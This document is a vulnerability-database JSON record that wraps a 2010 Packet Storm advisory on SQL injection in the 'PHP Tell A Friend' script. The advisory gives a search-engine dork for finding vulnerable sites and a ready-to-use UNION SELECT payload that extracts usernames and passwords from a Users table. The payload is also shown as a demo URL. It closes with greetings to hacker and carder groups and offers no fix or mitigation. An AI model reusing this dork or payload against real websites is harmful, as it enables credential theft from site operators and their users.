{"id": "PACKETSTORM:97013", "type": "packetstorm", "bulletinFamily": "exploit", "title": "PHP Tell A Friend SQL Injection", "description": "", "published": "2010-12-24T00:00:00", "modified": "2010-12-24T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/97013/PHP-Tell-A-Friend-SQL-Injection.html", "reporter": "jos_ali_joe", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:19", "viewCount": 9, "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.6}, "sourceHref": "https://packetstormsecurity.com/files/download/97013/phptellafriend-sql.txt", "sourceData": "`===================================================== \nPHP Tell A Friend SQL Injection Vulnerability \n===================================================== \n \n[+]Title : PHP Tell A Friend SQL Injection Vulnerability \n[+]Software : PHP Learn It! PHP Tell A Friend \n[+]Vendor : NN \n[+]Download : NN \n[+]Author : jos_ali_joe \n[+]Contact : josalijoe[at]hotmail[dot]com \n[+]Web : http://alicoder.wordpress.com/ ( New Blog jos_ali_joe ) \n[+]Home : http://indonesiancoder.com/ \n \n \n \n.___ .___ .__ _________ .___ \n| | ____ __| _/ ____ ____ ____ ______|__|_____ ____ \\_ ___ \\ ____ __| _/ ____ _______ \n| | / \\ / __ | / _ \\ / \\ _/ __ \\ / ___/| |\\__ \\ / \\ / \\ \\/ / _ \\ / __ | _/ __ \\ \\_ __ \\ \n| || | \\/ /_/ | ( <_> )| | \\\\ ___/ \\___ \\ | | / __ \\_| | \\\\ \\____( <_> )/ /_/ | \\ ___/ | | \\/ \n|___||___| /\\____ | \\____/ |___| / \\___ >/____ >|__|(____ /|___| / \\______ / \\____/ \\____ | \\___ > |__| \n\\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \n \n \n######################################################################## \n \nDork : inurl:\"email-friend.php?ID=\" \n \n######################################################################## \n \n------------------------------------------------------------------------ \n \nSQL Exploit \n \nExploit : +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,ID,username,password)20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,5 3,54,55,56,57,58,59+from+Users+limit+1--1 \n \nDemo \n \nExploit : \n \nhttp://127.0.0.1/email-friend.php?ID=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,ID,username,password)20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,5 3,54,55,56,57,58,59+from+Users+limit+1--1 \n \n-------------------------------------------------------------------------- \n \n \nGreets For : \n \n./Devilzc0de crew - Kebumen Cyber - Explore Crew - Indonesian Hacker - Tecon Crew - Magelang Cyber - Malang Cyber - kill-9 \n \n./Byroe Net - Yogya Carderlink - aten4 - Wannabe Hacker - Tecon Crew - DuniaSantai.com - All Underground Forum Indonesia \n \nMy Team : ./Indonesian Coder \n \nSpecial Thanks : \n \nSecurity Reason - Packetstorm Security \n \n \n[+] Note : \n \nHacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban. \nJika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban, \nBertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri. \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646793213}}

{}